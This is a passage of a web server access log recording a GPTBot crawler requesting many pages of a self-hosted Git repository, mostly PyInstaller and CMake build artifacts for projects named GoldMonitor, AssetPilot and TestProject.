74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:14:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16182] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" +[17/Feb/2026:14:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24007] [Gzip 15.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24007] [Gzip 15.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 10338] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10903] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:14:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10903] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:14:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 9893] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:14:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 31658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:14:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10915] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10915] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 22331] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 10891] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:14:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:14:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:14:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11038] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:14:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11039] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:14:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51201] [Gzip 26.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" +[17/Feb/2026:14:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 9889] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:14:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23980] [Gzip 15.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23979] [Gzip 15.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 4613369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:14:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10771] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" +[17/Feb/2026:14:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10220] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 60211] [Gzip 16.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 26716] [Gzip 20.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:14:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:14:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 10376] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 9892] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:14:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:14:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:59:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:14:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11164] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11281] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 